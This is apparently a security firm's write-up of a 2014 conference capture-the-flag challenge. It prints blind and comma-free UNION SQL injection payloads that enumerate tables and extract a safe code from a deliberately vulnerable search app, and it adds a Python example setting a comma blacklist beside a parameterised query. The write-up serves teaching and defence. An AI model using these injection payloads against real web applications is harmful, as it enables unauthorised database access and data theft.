B-Sides Manchester 2014
We hope everyone enjoyed the challenge. If you didn't notice, we had a combination safe on the Pentest stand, with a prize inside it. The combination for the safe was stored in a vulnerable web app, and everyone at the conference was invited to try and break in. The challenge was well received, so a big shout to Marcell for creating it!
If you want to have a go at the challenge, it is online at xref.info. The original challenge is there, and also a harder version. If you are going to attempt the challenge, stop reading now! There are spoilers below.
The app consists of a search box, which returns pictures of cats. It is easy to establish that the field is vulnerable to SQL injection. Most people quickly found the comment in the HTML source that points to the PHP source code. From here we can see the problem: we can't use commas in the payload. This is a deliberate restriction that stops people using tools like sqlmap to exploit the challenge.
We are aware of two basic solutions to the problem.
It is relatively straightforward to craft a query that returns true or false:
' and 1=1 #
The response contains five pictures of cats.
' and 1=2 #
The response contains no cat pictures.
What we want to do is get the names of all the tables in the database. For any table that looks interesting, we then get the names of its columns, and finally we extract the data from the interesting columns. The very first step is to get the name of the database, and we can use a query like this:
' and database() like 'a%' --
That query returns false, so we need to script it to go through all the letters. We did this using Python, and after a few hasty fixes, the script reveals that the database name begins with "t". We then repeat the process for the second letter, and so on, until we have extracted the full name: "test".
To get the table names we can use a query like this:
' and exists(select 1 from information_schema.tables where table_schema='test' and table_name like 'a%') --
Again, we need to script this to extract all the table names: "images" and "safe_codes". It is pretty clear which table is interesting to us!
To get the column names we can use a query like:
' and exists(select 1 from information_schema.columns where table_name='safe_codes' and column_name like 'a%') --
Once we've used the script to go through all the possibilities we find two columns: "location" and "code". Again, it is pretty clear which is the more interesting column.
To extract the codes we can use this query:
' and exists(select 1 from safe_codes where code like '1%') --
It's natural to script this to only consider numbers, and that produces a single code "1234". Unfortunately, that code does not open the safe. The mistake is that the true code actually contains letters and numbers. Running the script with letters enabled produces "S26112E" and that is the correct code to open the safe!
There may be more efficient blind exploitation techniques, but this is relatively simple and reliable.
When we designed the challenge we thought that a UNION injection would be impossible without a comma. However, one of the Pentest guys figured out the following syntax:
x' union select * from (select 1) a join (select database()) b join (select 1) c --
This extracts the database name directly and returns it in the src attribute of the image tag. From there we can proceed to extract the table names, column names, and finally the data:
x' union select * from (select 1) a join (select table_name from information_schema.tables where table_schema='test') b join (select 1) c --
x' union select * from (select 1) a join (select column_name from information_schema.columns where table_name='safe_codes') b join (select 1) c --
x' union select * from (select 1) a join (select code from safe_codes) b join (select 1) c --
Once you've figured out the join syntax, this approach is much more powerful than the blind approach. Respect to Dawid for his ninja SQL skills!
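The comma blacklist in the challenge stops sqlmap's stock payloads, but it does nothing about the injection itself: the true/false probes above contain no comma at all. As an added example (not the challenge's PHP and not Pentest's code), here is the blacklist-then-concatenate pattern beside a parameterised query, run against an in-memory SQLite stand-in whose "images" columns and rows are assumptions, driven with the page's two boolean probes.

```python
import sqlite3

# Constructed stand-in for the challenge database. The page names the tables
# "images" and "safe_codes" and the columns "location" and "code"; the "images"
# columns, the sample rows and the use of SQLite instead of MySQL are assumptions
# (the boolean probes below behave the same in both engines).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (name TEXT, src TEXT)")
    conn.executemany("INSERT INTO images VALUES (?, ?)",
                     [(f"cat{i}", f"/img/cat{i}.jpg") for i in range(1, 6)])
    conn.execute("CREATE TABLE safe_codes (location TEXT, code TEXT)")
    conn.execute("INSERT INTO safe_codes VALUES ('stand', 'NOT-THE-REAL-CODE')")
    return conn

def search_blacklist(conn, term):
    """The challenge's pattern: reject commas, then concatenate into the SQL."""
    if "," in term:
        raise ValueError("commas are not allowed")
    sql = f"SELECT src FROM images WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]

def search_parameterised(conn, term):
    """Hardened version: the term is bound as a value and is never parsed as SQL."""
    sql = "SELECT src FROM images WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]

def demo():
    """Row counts returned for the page's true/false probes by each version."""
    conn = build_db()
    probes = ["' and 1=1 --", "' and 1=2 --"]
    return {
        # 5 then 0: the two probes are distinguishable, so blind extraction works
        "blacklist": [len(search_blacklist(conn, p)) for p in probes],
        # 0 and 0: both probes are just literal search terms that match nothing
        "parameterised": [len(search_parameterised(conn, p)) for p in probes],
    }

if __name__ == "__main__":
    print(demo())
```

The blacklist version lets the probes flip the result set between all rows and none, which is exactly the oracle the blind approach needs; the parameterised version gives an attacker nothing to distinguish.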
Three teams completed the challenge, in order of completion:
- James Kettle and Rohan Durve
- Nick Bloor
- Nathan Baggs and Matt King
Everyone who completed it got some chocolate as an immediate prize. For the main prize, the three groups were put in a hat (in front of everyone during the wrap up session), Dr Jessica Barker picked one out and it was James Kettle & Rohan Durve. The prize is a Lenovo tablet, although we're not sure how they've decided to split it!
Pentest offers a thorough, yet adaptive range of security services to help customers address vulnerabilities in their network or applications. Services include: Secure Coding Workshops, SAST tools, Manual Penetration Testing and Security Audits.
Pentest offers a complete Database Security Assessment Service (DSAS) to businesses that rely on the security of the information held within their databases or have concerns relating to the security compliance of these systems.